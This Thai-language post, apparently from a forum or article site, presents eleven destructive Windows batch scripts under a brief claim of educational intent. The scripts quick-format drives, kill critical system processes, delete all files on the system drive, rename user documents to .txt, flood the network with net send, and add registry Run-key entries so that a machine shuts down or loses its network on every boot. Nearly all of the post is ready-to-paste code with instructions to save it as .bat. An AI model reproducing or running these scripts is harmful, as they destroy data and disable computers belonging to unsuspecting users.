ก็อื่นผมขอออกตัวก่อนเลยนะครับ ว่าไม่ได้มีเจตนาจะสอนใครสร้างไวรัสไว้ไปก่อกวนผู้อื่นทั้งนั้น ข้อมูลต่อไปนี้ใช้เพื่อศึกษาและป้องกันตนเองจากตัว .Bat ซึ่งสร้างความเสียหายแก่ผู้ที่รู้เท่าไม่ถึงกานได้
ก่อนอื่นมารู้จักตัว .Bat กันก่อนนะครับ
.bat คือไฟล์ที่ใช้เก็บคำสั่งที่ใช้ทำงานเล็กๆ น้อยๆ ซึ่งจะทำงานใน Command นะครับ
สำหรับวิธีนำไปใช้ ไม่ยากครับ เปิดโปรแกรม Notepad ขึ้นมาก จากนั้นใส่โค้ดเข้าไปแล้วเซฟไฟล์เป็น .bat ทำนี้คุณก็จะได้ไฟล์มา จากนั้นคุณก็ลองคลิกดูครับ ทดสอบว่าใช้ได้จริงหรือป่าว แต่ผมขอผ่านละก่อน ฝากให้เพื่อนตรวจสอบแล้ว :-)
ตัวอย่าง
1. Formatไดรฟ์อย่างเร็วที่สุด (8-9วิได้900กว่าMBทดสอบโดยแฮนดี้700กว่าKb/S)
Code:
format X: /q /y
X หมายถึงไดรฟ์ที่จะ Format เพื่อความเข้าใจ
format คือคำสั่ง Format
/q หมายถึง Format อย่างเร็วที่สุด
/yคือมันจะ Format เองเมื่อกดโดยอัตโนมัตควรลอกให้รออยู่ประมาน10-20วิแล้วทุกอย่างจะไปเอง
2. บถอยหลัง60วิปิดเครื่องโดยทำอะไรไม่ได้(เปิดใหม่ก็หายไม่หนักหนาลองได้)
Code:
TASKKILL /F /IM "explorer.exe"
TASKKILL /F /IM "dwm.exe"
TASKKILL /F /IM "ekrn.exe"
TASKKILL /F /IM "System.exe"
TASKKILL /F /IM "wininit.exe"
TASKKILL /F /IM "svchost.exe"
TASKKILL /F /IM "spoolsv.exe"
TASKKILL /F /IM "System Idle Process.exe"
TASKKILL /F /IM "rundll32.exe"
เพื่อความเข้าใจคำสั่งใน Dos TASSKILL
/F /IM คือคำสั่งฆ่าProcessesแล้ว""หมายถึงว่าจะฆ่าตัวอะไร
3. กดแล้ว ปิดเครื่อง
Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0
4. ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release
5. Combo Virus
Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
6. Disble IP Address
Code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE
7. สั่งปิดเครื่องทุกๆครั้งที่เปิดจนถึง11วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)
Code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE
8. ทำให้เกิด blue screen ที่บอกว่า file is missing please intall XP again
Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
9. Shutdown Computer every time its booted UP
Code:
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo HellBound Hackers Strike Again
PAUSE
10. Disabie internet/Network Permently
Code:
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo HellBound Hackers Strike Again
PAUSE
11. Change common files To TXT files
Code:
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
บทความนี้เกิดจากการเขียนและส่งขึ้นมาสู่ระบบแบบอัตโนมัติ สมาคมฯไม่รับผิดชอบต่อบทความหรือข้อความใดๆ ทั้งสิ้น เพราะไม่สามารถระบุได้ว่าเป็นความจริงหรือไม่ ผู้อ่านจึงควรใช้วิจารณญาณในการกลั่นกรอง และหากท่านพบเห็นข้อความใดที่ขัดต่อกฎหมายและศีลธรรม หรือทำให้เกิดความเสียหาย หรือละเมิดสิทธิใดๆ กรุณาแจ้งมาที่ ht.ro.apt@ecivres-bew เพื่อทีมงานจะได้ดำเนินการลบออกจากระบบในทันที